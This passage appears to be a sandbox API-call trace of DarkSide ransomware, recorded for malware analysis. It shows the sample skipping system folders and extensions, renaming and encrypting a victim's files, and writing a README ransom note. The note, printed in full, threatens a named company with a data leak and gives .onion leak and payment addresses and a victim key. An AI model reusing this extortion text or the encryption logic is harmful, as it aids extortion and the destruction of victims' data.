HALPmcxz\\Documents\\oHjAL\\DtR t6N.csv" [0149.145] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\DtR t6N.csv") returned 0x3d [0149.145] wcscpy (in: _Dest=0x4510112, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.145] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\DtR t6N.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\dtr t6n.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\DtR t6N.csv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\dtr t6n.csv.c06622a1"), dwFlags=0x8) returned 1 [0149.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\DtR t6N.csv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\dtr t6n.csv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x634 [0149.148] CreateIoCompletionPort (FileHandle=0x634, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0149.148] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x41f0020 [0149.153] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x606dd48e [0149.153] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1913d191 [0149.153] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x74a133b3 [0149.153] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x38213e7f [0149.153] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x59063d77 [0149.153] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x55648a9c [0149.153] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5ff9e700 [0149.153] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x644511b2 [0149.156] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x41f0094, Length=0x80) returned 0x407a733 [0149.156] RtlComputeCrc32 (PartialCrc=0xa733, Buffer=0x41f0094, Length=0x80) returned 0x77ef4bc5 [0149.156] RtlComputeCrc32 (PartialCrc=0x4bc5, Buffer=0x41f0094, Length=0x80) returned 0x346820f6 [0149.156] RtlComputeCrc32 (PartialCrc=0x20f6, Buffer=0x41f0094, Length=0x80) returned 0x4c9af364 [0149.156] RtlComputeCrc32 (PartialCrc=0xf364, Buffer=0x41f0094, Length=0x80) returned 0x8afee35 [0149.157] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0149.157] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0149.157] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0149.157] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbccd63a0, ftCreationTime.dwHighDateTime=0x1d5db19, ftLastAccessTime.dwLowDateTime=0x1336a990, ftLastAccessTime.dwHighDateTime=0x1d5e1b4, ftLastWriteTime.dwLowDateTime=0x1336a990, ftLastWriteTime.dwHighDateTime=0x1d5e1b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="F8m820x7", cAlternateFileName="")) returned 1 [0149.157] _wcsicmp (_Str1="$recycle.bin", _Str2="F8m820x7") returned -66 [0149.157] wcslen (_String="$recycle.bin") returned 0xc [0149.157] _wcsicmp (_Str1="config.msi", _Str2="F8m820x7") returned -3 [0149.157] wcslen (_String="config.msi") returned 0xa [0149.157] _wcsicmp (_Str1="$windows.~bt", _Str2="F8m820x7") returned -66 [0149.157] wcslen (_String="$windows.~bt") returned 0xc [0149.157] _wcsicmp (_Str1="$windows.~ws", _Str2="F8m820x7") returned -66 [0149.157] wcslen (_String="$windows.~ws") returned 0xc [0149.157] _wcsicmp (_Str1="windows", _Str2="F8m820x7") returned 17 [0149.157] wcslen (_String="windows") returned 0x7 [0149.157] _wcsicmp (_Str1="appdata", _Str2="F8m820x7") returned -5 [0149.157] wcslen (_String="appdata") returned 0x7 [0149.157] _wcsicmp (_Str1="application data", _Str2="F8m820x7") returned -5 [0149.157] wcslen (_String="application data") returned 0x10 [0149.157] _wcsicmp (_Str1="boot", _Str2="F8m820x7") returned -4 [0149.157] wcslen (_String="boot") returned 0x4 [0149.157] _wcsicmp (_Str1="google", _Str2="F8m820x7") returned 1 [0149.157] wcslen (_String="google") returned 0x6 [0149.157] _wcsicmp (_Str1="mozilla", _Str2="F8m820x7") returned 7 [0149.157] wcslen (_String="mozilla") returned 0x7 [0149.157] _wcsicmp (_Str1="program files", _Str2="F8m820x7") returned 10 [0149.157] wcslen (_String="program files") returned 0xd [0149.157] _wcsicmp (_Str1="program files (x86)", _Str2="F8m820x7") returned 10 [0149.157] wcslen (_String="program files (x86)") returned 0x13 [0149.157] _wcsicmp (_Str1="programdata", _Str2="F8m820x7") returned 10 [0149.157] wcslen (_String="programdata") returned 0xb [0149.157] _wcsicmp (_Str1="system volume information", _Str2="F8m820x7") returned 13 [0149.157] wcslen (_String="system volume information") returned 0x19 [0149.157] _wcsicmp (_Str1="tor browser", _Str2="F8m820x7") returned 14 [0149.157] wcslen (_String="tor browser") returned 0xb [0149.157] _wcsicmp (_Str1="windows.old", _Str2="F8m820x7") returned 17 [0149.158] wcslen (_String="windows.old") returned 0xb [0149.158] _wcsicmp (_Str1="intel", _Str2="F8m820x7") returned 3 [0149.158] wcslen (_String="intel") returned 0x5 [0149.158] _wcsicmp (_Str1="msocache", _Str2="F8m820x7") returned 7 [0149.158] wcslen (_String="msocache") returned 0x8 [0149.158] _wcsicmp (_Str1="perflogs", _Str2="F8m820x7") returned 10 [0149.158] wcslen (_String="perflogs") returned 0x8 [0149.158] _wcsicmp (_Str1="x64dbg", _Str2="F8m820x7") returned 18 [0149.158] wcslen (_String="x64dbg") returned 0x6 [0149.158] _wcsicmp (_Str1="public", _Str2="F8m820x7") returned 10 [0149.158] wcslen (_String="public") returned 0x6 [0149.158] _wcsicmp (_Str1="all users", _Str2="F8m820x7") returned -5 [0149.158] wcslen (_String="all users") returned 0x9 [0149.158] _wcsicmp (_Str1="default", _Str2="F8m820x7") returned -2 [0149.158] wcslen (_String="default") returned 0x7 [0149.158] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\*" [0149.158] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\*") returned 0x33 [0149.158] wcscpy (in: _Dest=0x44e00e4, _Source="F8m820x7" | out: _Dest="F8m820x7") returned="F8m820x7" [0149.158] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0149.158] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0149.159] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" [0149.159] GetNamedSecurityInfoW () returned 0x0 [0149.159] SetEntriesInAclW () returned 0x0 [0149.159] SetNamedSecurityInfoW () returned 0x0 [0149.166] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d57658) returned 1 [0149.166] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe5bc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0149.166] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7")) returned 1 [0149.166] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0149.166] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0149.167] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe58c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe58c*=0xa8f, lpOverlapped=0x0) returned 1 [0149.168] CloseHandle (hObject=0x1c) returned 1 [0149.168] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0149.168] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7")) returned 0x10 [0149.168] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\") returned="" [0149.168] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\") returned 0x3b [0149.168] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\*", fInfoLevelId=0x0, lpFindFileData=0x3fe7ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fe7ec) returned 0x2db87c0 [0149.168] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbccd63a0, ftCreationTime.dwHighDateTime=0x1d5db19, ftLastAccessTime.dwLowDateTime=0xd787a2a0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd787a2a0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.169] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x246f6480, ftCreationTime.dwHighDateTime=0x1d5e4f8, ftLastAccessTime.dwLowDateTime=0x10bd5ae0, ftLastAccessTime.dwHighDateTime=0x1d5e643, ftLastWriteTime.dwLowDateTime=0x10bd5ae0, ftLastWriteTime.dwHighDateTime=0x1d5e643, nFileSizeHigh=0x0, nFileSizeLow=0x4b51, dwReserved0=0x0, dwReserved1=0x0, cFileName="05G4A_bd.doc", cAlternateFileName="")) returned 1 [0149.169] _wcsicmp (_Str1="05G4A_bd.doc", _Str2="README.c06622a1.TXT") returned -66 [0149.169] wcsstr (_Str="05G4A_bd.doc", _SubStr="README") returned 0x0 [0149.169] _wcsicmp (_Str1="autorun.inf", _Str2="05G4A_bd.doc") returned 49 [0149.169] wcslen (_String="autorun.inf") returned 0xb [0149.169] _wcsicmp (_Str1="boot.ini", _Str2="05G4A_bd.doc") returned 50 [0149.169] wcslen (_String="boot.ini") returned 0x8 [0149.169] _wcsicmp (_Str1="bootfont.bin", _Str2="05G4A_bd.doc") returned 50 [0149.169] wcslen (_String="bootfont.bin") returned 0xc [0149.169] _wcsicmp (_Str1="bootsect.bak", _Str2="05G4A_bd.doc") returned 50 [0149.169] wcslen (_String="bootsect.bak") returned 0xc [0149.169] _wcsicmp (_Str1="desktop.ini", _Str2="05G4A_bd.doc") returned 52 [0149.169] wcslen (_String="desktop.ini") returned 0xb [0149.169] _wcsicmp (_Str1="iconcache.db", _Str2="05G4A_bd.doc") returned 57 [0149.169] wcslen (_String="iconcache.db") returned 0xc [0149.169] _wcsicmp (_Str1="ntldr", _Str2="05G4A_bd.doc") returned 62 [0149.169] wcslen (_String="ntldr") returned 0x5 [0149.169] _wcsicmp (_Str1="ntuser.dat", _Str2="05G4A_bd.doc") returned 62 [0149.169] wcslen (_String="ntuser.dat") returned 0xa [0149.169] _wcsicmp (_Str1="ntuser.dat.log", _Str2="05G4A_bd.doc") returned 62 [0149.169] wcslen (_String="ntuser.dat.log") returned 0xe [0149.169] _wcsicmp (_Str1="ntuser.ini", _Str2="05G4A_bd.doc") returned 62 [0149.169] wcslen (_String="ntuser.ini") returned 0xa [0149.169] _wcsicmp (_Str1="thumbs.db", _Str2="05G4A_bd.doc") returned 68 [0149.169] wcslen (_String="thumbs.db") returned 0x9 [0149.169] _wcsicmp (_Str1="386", _Str2="doc") returned -49 [0149.170] wcslen (_String="386") returned 0x3 [0149.170] _wcsicmp (_Str1="adv", _Str2="doc") returned -3 [0149.170] wcslen (_String="adv") returned 0x3 [0149.170] _wcsicmp (_Str1="ani", _Str2="doc") returned -3 [0149.170] wcslen (_String="ani") returned 0x3 [0149.170] _wcsicmp (_Str1="bat", _Str2="doc") returned -2 [0149.170] wcslen (_String="bat") returned 0x3 [0149.170] _wcsicmp (_Str1="bin", _Str2="doc") returned -2 [0149.170] wcslen (_String="bin") returned 0x3 [0149.170] _wcsicmp (_Str1="cab", _Str2="doc") returned -1 [0149.170] wcslen (_String="cab") returned 0x3 [0149.170] _wcsicmp (_Str1="cmd", _Str2="doc") returned -1 [0149.170] wcslen (_String="cmd") returned 0x3 [0149.170] _wcsicmp (_Str1="com", _Str2="doc") returned -1 [0149.170] wcslen (_String="com") returned 0x3 [0149.170] _wcsicmp (_Str1="cpl", _Str2="doc") returned -1 [0149.170] wcslen (_String="cpl") returned 0x3 [0149.170] _wcsicmp (_Str1="cur", _Str2="doc") returned -1 [0149.170] wcslen (_String="cur") returned 0x3 [0149.170] _wcsicmp (_Str1="deskthemepack", _Str2="doc") returned -10 [0149.170] wcslen (_String="deskthemepack") returned 0xd [0149.170] _wcsicmp (_Str1="diagcab", _Str2="doc") returned -6 [0149.170] wcslen (_String="diagcab") returned 0x7 [0149.170] _wcsicmp (_Str1="diagcfg", _Str2="doc") returned -6 [0149.170] wcslen (_String="diagcfg") returned 0x7 [0149.170] _wcsicmp (_Str1="diagpkg", _Str2="doc") returned -6 [0149.170] wcslen (_String="diagpkg") returned 0x7 [0149.170] _wcsicmp (_Str1="dll", _Str2="doc") returned -3 [0149.170] wcslen (_String="dll") returned 0x3 [0149.170] _wcsicmp (_Str1="drv", _Str2="doc") returned 3 [0149.170] wcslen (_String="drv") returned 0x3 [0149.170] _wcsicmp (_Str1="exe", _Str2="doc") returned 1 [0149.170] wcslen (_String="exe") returned 0x3 [0149.170] _wcsicmp (_Str1="hlp", _Str2="doc") returned 4 [0149.170] wcslen (_String="hlp") returned 0x3 [0149.170] _wcsicmp (_Str1="icl", _Str2="doc") returned 5 [0149.170] wcslen (_String="icl") returned 0x3 [0149.170] _wcsicmp (_Str1="icns", _Str2="doc") returned 5 [0149.170] wcslen (_String="icns") returned 0x4 [0149.171] _wcsicmp (_Str1="ico", _Str2="doc") returned 5 [0149.171] wcslen (_String="ico") returned 0x3 [0149.171] _wcsicmp (_Str1="ics", _Str2="doc") returned 5 [0149.171] wcslen (_String="ics") returned 0x3 [0149.171] _wcsicmp (_Str1="idx", _Str2="doc") returned 5 [0149.171] wcslen (_String="idx") returned 0x3 [0149.171] _wcsicmp (_Str1="ldf", _Str2="doc") returned 8 [0149.171] wcslen (_String="ldf") returned 0x3 [0149.171] _wcsicmp (_Str1="lnk", _Str2="doc") returned 8 [0149.171] wcslen (_String="lnk") returned 0x3 [0149.171] _wcsicmp (_Str1="mod", _Str2="doc") returned 9 [0149.171] wcslen (_String="mod") returned 0x3 [0149.171] _wcsicmp (_Str1="mpa", _Str2="doc") returned 9 [0149.171] wcslen (_String="mpa") returned 0x3 [0149.171] _wcsicmp (_Str1="msc", _Str2="doc") returned 9 [0149.171] wcslen (_String="msc") returned 0x3 [0149.171] _wcsicmp (_Str1="msp", _Str2="doc") returned 9 [0149.171] wcslen (_String="msp") returned 0x3 [0149.171] _wcsicmp (_Str1="msstyles", _Str2="doc") returned 9 [0149.171] wcslen (_String="msstyles") returned 0x8 [0149.171] _wcsicmp (_Str1="msu", _Str2="doc") returned 9 [0149.171] wcslen (_String="msu") returned 0x3 [0149.171] _wcsicmp (_Str1="nls", _Str2="doc") returned 10 [0149.171] wcslen (_String="nls") returned 0x3 [0149.171] _wcsicmp (_Str1="nomedia", _Str2="doc") returned 10 [0149.171] wcslen (_String="nomedia") returned 0x7 [0149.171] _wcsicmp (_Str1="ocx", _Str2="doc") returned 11 [0149.171] wcslen (_String="ocx") returned 0x3 [0149.171] _wcsicmp (_Str1="prf", _Str2="doc") returned 12 [0149.171] wcslen (_String="prf") returned 0x3 [0149.171] _wcsicmp (_Str1="ps1", _Str2="doc") returned 12 [0149.171] wcslen (_String="ps1") returned 0x3 [0149.171] _wcsicmp (_Str1="rom", _Str2="doc") returned 14 [0149.171] wcslen (_String="rom") returned 0x3 [0149.171] _wcsicmp (_Str1="rtp", _Str2="doc") returned 14 [0149.171] wcslen (_String="rtp") returned 0x3 [0149.171] _wcsicmp (_Str1="scr", _Str2="doc") returned 15 [0149.171] wcslen (_String="scr") returned 0x3 [0149.171] _wcsicmp (_Str1="shs", _Str2="doc") returned 15 [0149.172] wcslen (_String="shs") returned 0x3 [0149.172] _wcsicmp (_Str1="spl", _Str2="doc") returned 15 [0149.172] wcslen (_String="spl") returned 0x3 [0149.172] _wcsicmp (_Str1="sys", _Str2="doc") returned 15 [0149.172] wcslen (_String="sys") returned 0x3 [0149.172] _wcsicmp (_Str1="theme", _Str2="doc") returned 16 [0149.172] wcslen (_String="theme") returned 0x5 [0149.172] _wcsicmp (_Str1="themepack", _Str2="doc") returned 16 [0149.172] wcslen (_String="themepack") returned 0x9 [0149.172] _wcsicmp (_Str1="wpx", _Str2="doc") returned 19 [0149.172] wcslen (_String="wpx") returned 0x3 [0149.172] _wcsicmp (_Str1="lock", _Str2="doc") returned 8 [0149.172] wcslen (_String="lock") returned 0x4 [0149.172] _wcsicmp (_Str1="key", _Str2="doc") returned 7 [0149.172] wcslen (_String="key") returned 0x3 [0149.172] _wcsicmp (_Str1="hta", _Str2="doc") returned 4 [0149.172] wcslen (_String="hta") returned 0x3 [0149.172] _wcsicmp (_Str1="msi", _Str2="doc") returned 9 [0149.172] wcslen (_String="msi") returned 0x3 [0149.172] _wcsicmp (_Str1="pdb", _Str2="doc") returned 12 [0149.172] wcslen (_String="pdb") returned 0x3 [0149.172] _wcsicmp (_Str1="sql", _Str2="doc") returned 15 [0149.172] wcslen (_String="sql") returned 0x3 [0149.172] _wcsicmp (_Str1="sqlite", _Str2="doc") returned 15 [0149.172] wcslen (_String="sqlite") returned 0x6 [0149.172] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7")) returned 0x10 [0149.172] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0149.173] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" [0149.173] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7") returned 0x3a [0149.173] wcscpy (in: _Dest=0x453011e, _Source="05G4A_bd.doc" | out: _Dest="05G4A_bd.doc") returned="05G4A_bd.doc" [0149.173] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\05G4A_bd.doc", dwFileAttributes=0x80) returned 1 [0149.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\05G4A_bd.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\05g4a_bd.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x638 [0149.173] SetFilePointerEx (in: hFile=0x638, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.173] ReadFile (in: hFile=0x638, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0149.174] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0xa092102d [0149.174] RtlComputeCrc32 (PartialCrc=0x102d, Buffer=0x3fe674, Length=0x80) returned 0x74700ad3 [0149.174] RtlComputeCrc32 (PartialCrc=0xad3, Buffer=0x3fe674, Length=0x80) returned 0xabf7067d [0149.174] RtlComputeCrc32 (PartialCrc=0x67d, Buffer=0x3fe674, Length=0x80) returned 0x2f127206 [0149.174] RtlComputeCrc32 (PartialCrc=0x7206, Buffer=0x3fe674, Length=0x80) returned 0xd08db6bd [0149.174] CloseHandle (hObject=0x638) returned 1 [0149.174] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0149.174] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\05G4A_bd.doc" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\05G4A_bd.doc") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\05G4A_bd.doc" [0149.174] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\05G4A_bd.doc") returned 0x47 [0149.174] wcscpy (in: _Dest=0x454013e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.174] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\05G4A_bd.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\05g4a_bd.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\05G4A_bd.doc.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\05g4a_bd.doc.c06622a1"), dwFlags=0x8) returned 1 [0149.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\05G4A_bd.doc.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\05g4a_bd.doc.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x638 [0149.178] CreateIoCompletionPort (FileHandle=0x638, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0149.178] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4280020 [0149.183] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x23cfb750 [0149.183] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x784860ee [0149.183] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x406dc1b6 [0149.183] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x418a972d [0149.183] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x57f2ccac [0149.183] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x15b90299 [0149.183] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3aac7164 [0149.183] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x45a5b7dc [0149.186] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4280094, Length=0x80) returned 0x552c6675 [0149.186] RtlComputeCrc32 (PartialCrc=0x6675, Buffer=0x4280094, Length=0x80) returned 0xc9e4c465 [0149.186] RtlComputeCrc32 (PartialCrc=0xc465, Buffer=0x4280094, Length=0x80) returned 0xf137e1f3 [0149.186] RtlComputeCrc32 (PartialCrc=0xe1f3, Buffer=0x4280094, Length=0x80) returned 0xcf3a09c2 [0149.186] RtlComputeCrc32 (PartialCrc=0x9c2, Buffer=0x4280094, Length=0x80) returned 0xcacd18b2 [0149.186] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, 